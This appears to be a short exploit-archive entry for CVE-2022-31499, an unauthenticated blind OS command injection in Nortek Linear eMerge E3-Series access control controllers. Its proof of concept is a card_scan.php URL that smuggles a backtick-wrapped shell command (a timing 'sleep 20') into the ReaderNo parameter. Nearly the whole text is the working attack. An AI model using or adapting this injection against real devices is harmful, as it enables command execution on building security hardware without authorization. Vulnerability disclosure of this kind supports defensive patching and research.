# Exploit Title: Nortek Linear eMerge E3-Series - Blind OS Command Injection # Exploit Author: Omar Hashim # Version: 0.32-09c # Vendor home page: https://www.nortekcontrol.com/access-control/ # Vendor home page: https://linear-solutions.com/ # Authentication Required: No # CVE: CVE-2022-31499 # POC: ==================== http://card_scan.php?No=1337&ReaderNo=`sleep 20`&CardFormatNo=1337